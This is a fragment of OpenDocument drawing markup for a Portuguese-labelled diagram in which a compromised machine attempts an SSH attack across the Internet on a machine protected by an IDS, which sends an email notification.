            <draw:enhanced-geometry svg:viewBox="0 0 21600 21600" draw:glue-points="10800 0 3160 3160 0 10800 3160 18440 10800 21600 18440 18440 21600 10800 18440 3160" draw:text-areas="3200 3200 18400 18400" draw:type="ellipse"/>
          </draw:custom-shape>
          <draw:frame draw:style-name="gr6" draw:text-style-name="P4" draw:layer="layout" svg:width="0.968cm" svg:height="0.988cm" svg:x="4.405cm" svg:y="2.681cm">
            <draw:text-box>
              <text:p text:style-name="P3"><text:span text:style-name="T1">P</text:span></text:p>
            </draw:text-box>
          </draw:frame>
          <draw:frame draw:style-name="gr6" draw:text-style-name="P5" draw:layer="layout" svg:width="2.314cm" svg:height="0.78cm" svg:x="5.71cm" svg:y="2.512cm">
            <draw:text-box>
              <text:p text:style-name="P3"><text:span text:style-name="T2">Internet</text:span></text:p>
            </draw:text-box>
          </draw:frame>
        </draw:g>
        <draw:frame draw:style-name="gr7" draw:text-style-name="P7" draw:layer="layout" svg:width="3.998cm" svg:height="0.911cm" svg:x="0.719cm" svg:y="0.907cm">
          <draw:text-box>
            <text:p text:style-name="P6"><text:span text:style-name="T3">1. Máquina comprometida em A</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:frame draw:style-name="gr7" draw:text-style-name="P7" draw:layer="layout" svg:width="4.13cm" svg:height="0.911cm" svg:x="9.248cm" svg:y="1.02cm">
          <draw:text-box>
            <text:p text:style-name="P6"><text:span text:style-name="T3">3. Máquina protegida e com IDS em B</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:path draw:style-name="gr8" draw:text-style-name="P1" draw:layer="layout" svg:width="8.182cm" svg:height="0.767cm" svg:x="2.459cm" svg:y="3.932cm" svg:viewBox="0 0 8183 768" svg:d="m0 49c3381 1647 8182-49 8182-49">
          <text:p text:style-name="P3"/>
        </draw:path>
        <draw:g>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="1.378cm" svg:height="0.57cm" svg:x="1.517cm" svg:y="1.932cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 860 356" draw:type="non-primitive" draw:enhanced-path="M 0 296 L 580 356 860 59 309 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.436cm" svg:height="0.532cm" svg:x="2.435cm" svg:y="3.95cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 272 332" draw:type="non-primitive" draw:enhanced-path="M 272 53 L 272 0 0 268 4 332 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.557cm" svg:height="2.378cm" svg:x="2.344cm" svg:y="2.019cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 348 1484" draw:type="non-primitive" draw:enhanced-path="M 64 298 L 0 1412 80 1484 348 1209 348 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.902cm" svg:height="0.207cm" svg:x="1.54cm" svg:y="4.288cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 563 129" draw:type="non-primitive" draw:enhanced-path="M 563 129 L 563 61 0 0 0 68 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.942cm" svg:height="2.002cm" svg:x="1.517cm" svg:y="2.406cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 588 1250" draw:type="non-primitive" draw:enhanced-path="M 588 1250 L 588 57 0 0 0 1194 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="1.384cm" svg:height="0.579cm" svg:x="1.493cm" svg:y="1.906cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 864 361" draw:type="non-primitive" draw:enhanced-path="M 0 297 L 585 361 864 60 313 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr10" draw:text-style-name="P2" draw:layer="layout" svg:width="0.433cm" svg:height="0.526cm" svg:x="2.418cm" svg:y="3.932cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 271 328" draw:type="non-primitive" draw:enhanced-path="M 271 53 L 271 0 0 268 0 328 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr11" draw:text-style-name="P2" draw:layer="layout" svg:width="0.557cm" svg:height="2.371cm" svg:x="2.32cm" svg:y="2.002cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 348 1480" draw:type="non-primitive" draw:enhanced-path="M 69 301 L 0 1413 79 1480 348 1205 348 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.901cm" svg:height="0.199cm" svg:x="1.517cm" svg:y="4.27cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 562 124" draw:type="non-primitive" draw:enhanced-path="M 562 124 L 562 60 0 0 0 64 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.949cm" svg:height="2.015cm" svg:x="1.493cm" svg:y="2.382cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 592 1258" draw:type="non-primitive" draw:enhanced-path="M 592 1258 L 592 64 0 0 0 1190 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.907cm" svg:height="1.965cm" svg:x="1.517cm" svg:y="2.401cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 566 1227" draw:type="non-primitive" draw:enhanced-path="M 566 1227 L 566 60 0 0 0 1171 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.761cm" svg:height="0.356cm" svg:x="1.583cm" svg:y="2.931cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 475 222" draw:type="non-primitive" draw:enhanced-path="M 475 222 L 475 49 0 0 0 173 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.78cm" svg:height="0.253cm" svg:x="1.576cm" svg:y="2.515cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 487 158" draw:type="non-primitive" draw:enhanced-path="M 487 158 L 487 49 0 0 0 109 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr9" draw:text-style-name="P2" draw:layer="layout" svg:width="0.761cm" svg:height="0.357cm" svg:x="1.583cm" svg:y="3.25cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 475 223" draw:type="non-primitive" draw:enhanced-path="M 475 223 L 475 50 0 0 0 174 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.745cm" svg:height="0.146cm" svg:x="1.594cm" svg:y="4.113cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 465 91" draw:type="non-primitive" draw:enhanced-path="M 465 91 L 465 53 0 0 0 34 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.738cm" svg:height="0.127cm" svg:x="1.588cm" svg:y="2.545cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 461 79" draw:type="non-primitive" draw:enhanced-path="M 461 79 L 461 45 0 0 0 30 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.738cm" svg:height="0.133cm" svg:x="1.588cm" svg:y="2.624cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 461 83" draw:type="non-primitive" draw:enhanced-path="M 461 83 L 461 49 0 0 0 34 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.726cm" svg:height="0.32cm" svg:x="1.6cm" svg:y="2.949cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 453 200" draw:type="non-primitive" draw:enhanced-path="M 453 200 L 453 49 0 0 0 151 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.726cm" svg:height="0.326cm" svg:x="1.6cm" svg:y="3.269cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 453 203" draw:type="non-primitive" draw:enhanced-path="M 453 203 L 453 53 0 0 0 154 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.091cm" svg:height="0.091cm" svg:x="2.235cm" svg:y="4.041cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 57 57" draw:type="non-primitive" draw:enhanced-path="M 57 57 L 57 7 0 0 0 53 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:frame draw:style-name="gr13" draw:text-style-name="P8" draw:layer="layout" svg:width="5.054cm" svg:height="0.581cm" svg:x="3.917cm" svg:y="3.953cm">
          <draw:text-box>
            <text:p text:style-name="P6"><text:span text:style-name="T4">2. Tentativa de ataque por SSH</text:span></text:p>
          </draw:text-box>
        </draw:frame>
        <draw:path draw:style-name="gr8" draw:text-style-name="P1" draw:layer="layout" svg:width="5.717cm" svg:height="0.96cm" svg:x="5.04cm" svg:y="1.721cm" svg:viewBox="0 0 5718 961" svg:d="m5717 396c-3351-1148-5717 564-5717 564">
          <text:p text:style-name="P3"/>
        </draw:path>
        <draw:g>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="1.335cm" svg:height="0.564cm" svg:x="10.561cm" svg:y="1.92cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 880 372" draw:type="non-primitive" draw:enhanced-path="M 0 309 L 596 372 880 65 314 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.427cm" svg:height="0.523cm" svg:x="11.448cm" svg:y="3.878cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 281 345" draw:type="non-primitive" draw:enhanced-path="M 281 57 L 281 0 0 277 4 345 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.534cm" svg:height="2.304cm" svg:x="11.367cm" svg:y="2.014cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 352 1518" draw:type="non-primitive" draw:enhanced-path="M 65 304 L 0 1444 81 1518 352 1232 352 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.873cm" svg:height="0.191cm" svg:x="10.581cm" svg:y="4.215cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 576 126" draw:type="non-primitive" draw:enhanced-path="M 576 126 L 576 58 0 0 0 68 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.913cm" svg:height="1.939cm" svg:x="10.561cm" svg:y="2.389cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 602 1278" draw:type="non-primitive" draw:enhanced-path="M 602 1278 L 602 57 0 0 0 1221 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="1.332cm" svg:height="0.559cm" svg:x="10.549cm" svg:y="1.906cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 878 368" draw:type="non-primitive" draw:enhanced-path="M 0 304 L 593 368 878 61 312 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.427cm" svg:height="0.507cm" svg:x="11.427cm" svg:y="3.867cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 281 334" draw:type="non-primitive" draw:enhanced-path="M 281 47 L 281 0 0 271 7 334 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr15" draw:text-style-name="P2" draw:layer="layout" svg:width="0.54cm" svg:height="2.301cm" svg:x="11.341cm" svg:y="1.993cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 356 1516" draw:type="non-primitive" draw:enhanced-path="M 71 307 L 0 1441 82 1516 356 1235 356 0 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.877cm" svg:height="0.193cm" svg:x="10.561cm" svg:y="4.192cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 578 127" draw:type="non-primitive" draw:enhanced-path="M 578 127 L 578 63 0 0 0 67 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.905cm" svg:height="1.946cm" svg:x="10.549cm" svg:y="2.357cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 597 1282" draw:type="non-primitive" draw:enhanced-path="M 597 1282 L 597 67 0 0 0 1224 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.883cm" svg:height="1.916cm" svg:x="10.555cm" svg:y="2.378cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 582 1262" draw:type="non-primitive" draw:enhanced-path="M 582 1262 L 582 64 0 0 0 1197 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.741cm" svg:height="0.343cm" svg:x="10.626cm" svg:y="2.894cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 488 226" draw:type="non-primitive" draw:enhanced-path="M 488 226 L 488 47 0 0 0 179 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.757cm" svg:height="0.241cm" svg:x="10.62cm" svg:y="2.495cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 499 159" draw:type="non-primitive" draw:enhanced-path="M 499 159 L 499 47 0 0 0 111 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr14" draw:text-style-name="P2" draw:layer="layout" svg:width="0.741cm" svg:height="0.349cm" svg:x="10.626cm" svg:y="3.201cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 488 230" draw:type="non-primitive" draw:enhanced-path="M 488 230 L 488 51 0 0 0 183 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.716cm" svg:height="0.137cm" svg:x="10.641cm" svg:y="4.043cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 472 90" draw:type="non-primitive" draw:enhanced-path="M 472 90 L 472 53 0 0 0 37 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.719cm" svg:height="0.134cm" svg:x="10.632cm" svg:y="2.51cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 474 88" draw:type="non-primitive" draw:enhanced-path="M 474 88 L 474 54 0 0 0 37 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.719cm" svg:height="0.128cm" svg:x="10.632cm" svg:y="2.598cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 474 84" draw:type="non-primitive" draw:enhanced-path="M 474 84 L 474 47 0 0 0 34 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.704cm" svg:height="0.311cm" svg:x="10.641cm" svg:y="2.911cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 464 205" draw:type="non-primitive" draw:enhanced-path="M 464 205 L 464 50 0 0 0 158 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.704cm" svg:height="0.313cm" svg:x="10.641cm" svg:y="3.222cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 464 206" draw:type="non-primitive" draw:enhanced-path="M 464 206 L 464 54 0 0 0 155 Z N"/>
          </draw:custom-shape>
          <draw:custom-shape draw:style-name="gr12" draw:text-style-name="P2" draw:layer="layout" svg:width="0.092cm" svg:height="0.091cm" svg:x="11.259cm" svg:y="3.975cm">
            <text:p text:style-name="P3"/>
            <draw:enhanced-geometry svg:viewBox="0 0 61 60" draw:type="non-primitive" draw:enhanced-path="M 61 60 L 61 7 0 0 0 50 Z N"/>
          </draw:custom-shape>
        </draw:g>
        <draw:frame draw:style-name="gr13" draw:text-style-name="P8" draw:layer="layout" svg:width="4.28cm" svg:height="0.581cm" svg:x="4.617cm" svg:y="1.24cm">
          <draw:text-box>
            <text:p text:style-name="P6"><text:span text:style-name="T4">4. Notificação por e-mail</text:span></text:p>
          </draw:text-box>
        </draw:frame>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b1b100" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_15" draw:display-name="Gradient 15" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#ffad2c" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_16" draw:display-name="Gradient 16" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#ffad2c" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_26" draw:display-name="Gradient 26" draw:style="axial" draw:start-color="#9ad9ff" draw:end-color="#ffffff" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_27" draw:display-name="Gradient 27" draw:style="rectangular" draw:cx="50%" draw:cy="50%" draw:start-color="#ffffff" draw:end-color="#9ad9ff" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_28" draw:display-name="Gradient 28" draw:style="axial" draw:start-color="#9ad9ff" draw:end-color="#ffffff" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="1800" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_7" draw:display-name="Gradient 7" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#009800" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_8" draw:display-name="Gradient 8" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#008000" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="2250" draw:border="0%"/>
    <draw:gradient draw:name="Gradient_20_9" draw:display-name="Gradient 9" draw:style="linear" draw:start-color="#ffffff" draw:end-color="#005100" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="3150" draw:border="0%"/>
    <draw:gradient draw:name="Seta_20_pra_20_Baixo" draw:display-name="Seta pra Baixo" draw:style="axial" draw:start-color="#00ffff" draw:end-color="#0099ff" draw:start-intensity="100%" draw:end-intensity="100%" draw:angle="9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pitch-asian="variable" style:font-size-asian="24pt" style:language-asian="none" style:country-asian="none" style:font-family-complex="Tahoma"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14cm" fo:page-height="6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solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#009800" draw:fill-gradient-name="Gradient_20_7" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr2" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#008000" draw:fill-gradient-name="Gradient_20_8" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr3" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#005100" draw:fill-gradient-name="Gradient_20_9" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr4" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#b1b100" draw:fill-gradient-name="Gradient_20_10" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr5" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties svg:stroke-width="0.05cm" svg:stroke-color="#ff0000" draw:marker-start-width="0.275cm" draw:marker-end="Arrow" draw:marker-end-width="0.275cm" draw:textarea-horizontal-align="center" draw:textarea-vertical-align="middle" fo:padding-top="0.15cm" fo:padding-bottom="0.15cm" fo:padding-left="0.275cm" fo:padding-right="0.275cm"/>
    </style:style>
    <style:style style:name="gr6" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#a0a0a0" draw:fill-gradient-name="Gradient_20_17" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr7" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#002c7c" draw:fill-gradient-name="Gradient_20_18"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35cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#0000ff" draw:fill-gradient-name="Gradient_20_19" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr9" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="miter" draw:fill="gradient" draw:fill-color="#a0a0a0" draw:fill-gradient-name="Gradient_20_17" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr10" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:marker-start="" draw:marker-start-width="0.21cm" draw:marker-start-center="false" draw:marker-end=""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11" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#000000" draw:fill-gradient-name="Gradient_20_20" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr12" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#919191" draw:fill-gradient-name="Gradient_20_21" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr13" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#000000" draw:fill-gradient-name="Gradient_20_22" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr14" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="solid" draw:fill-color="#00b0bc" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr15" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#6e6e6e" draw:fill-gradient-name="Gradient_20_23" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr16" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#bc0024" draw:fill-gradient-name="Gradient_20_11" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr17" style:family="graphic" style:parent-style-name="standard">
      <style:graphic-properties draw:stroke="solid" svg:stroke-width="0.035cm" svg:stroke-color="#000000" draw:stroke-linejoin="round" draw:fill="gradient" draw:fill-color="#bc0024" draw:fill-gradient-name="Gradient_20_12" draw:textarea-horizontal-align="left" draw:textarea-vertical-align="top" draw:auto-grow-height="false" fo:padding-top="0.13cm" fo:padding-bottom="0.13cm" fo:padding-left="0.25cm" fo:padding-right="0.25cm" fo:wrap-option="wrap" draw:shadow="hidden" draw:shadow-color="#808080"/>
    </style:style>
    <style:style style:name="gr18" style:family="graphic" style:parent-style-name="standard">
